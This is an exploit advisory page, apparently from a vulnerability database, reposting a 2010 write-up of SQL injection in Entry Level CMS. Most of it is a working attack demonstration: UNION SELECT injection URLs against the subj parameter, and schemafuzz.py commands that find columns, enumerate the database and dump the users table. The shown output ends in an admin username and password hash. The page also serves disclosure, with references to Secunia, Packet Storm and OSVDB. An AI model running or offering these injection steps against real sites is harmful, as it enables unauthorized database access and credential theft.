SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py

2010.03.25
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[+]Title : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py --==[ Author ]==-- [+] Author : [+] HaMaDa SCoOoRPioN (NEWBIE) [+] Contact : 0u@linuxmail.org [+] Group : The ISLAM OF DEFENDERS AND ATTACK [+] Site : www.islam-defenders.com ******************************************** [Software Information ] [+]SOftware : Entry Level Content Management System (EL CMS) [+]vendor : http://www.entrylevelcms.com/ [+]Vulnerability : SQL Injection ******************************************** [ Vulnerable File ] http://localhost/website/index.php?subj=4 [demo with schemafuzz.py] |--------------------------------------------------------------- | 0u[at]linuxmail[dot]org v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ C:Python26exploitschemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol [+] URL:http://localhost/website/index.php?subj=6-- [+] Evasion Used: "+" "--" [+] 03:36:40 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3, [+] Column Length is: 4 [+] Found null column at column #: 0 [+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3-- [+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2 ,3 [-] Done! C:Python26exploitschemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1, 2,3" --full |------------------------------------------------------------ | | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de ,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:33:34 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [Database]: elcms_db [Table: Columns] [0]pages: id,subject_id,menu_name,position,visible,content [1]subjects: id,menu_name,position,visible [2]users: id,username,hashed_password [-] [05:55:27] [-] Total URL Requests 17 [-] Done C:Python26schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1, 2,3" --dump -D elcms_db -T users -C id,username,hashed_password |------------------------------------------------------------ | | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de ,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:35:14 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [+] Dumping data from database "vman" Table "users" [+] Column(s) ['id', 'username', 'hashed_password'] [+] Number of Rows: 1 [0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b 8f19f541d436c8: [-] [05:35:15] [-] Total URL Requests 3 [-] Done If you not understand about it [Option/help this tools] schemafuzz.py -h ******************************************** -- Thank YOU BRO HaMaDa SCoOoRPioN www.islam-defenders.com 0u@linuxmail.org ________________________________ Hotmail: ???? ???????? ????? ??? ?????? ?????? Microsoft ?????? ?? ?????? ????????. ????? ????.<https://signup.live.com/signup.aspx?id=60969>

Referencje:

http://secunia.com/advisories/38688
http://packetstormsecurity.org/1002-exploits/elcms-sql.txt
http://osvdb.org/62513


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top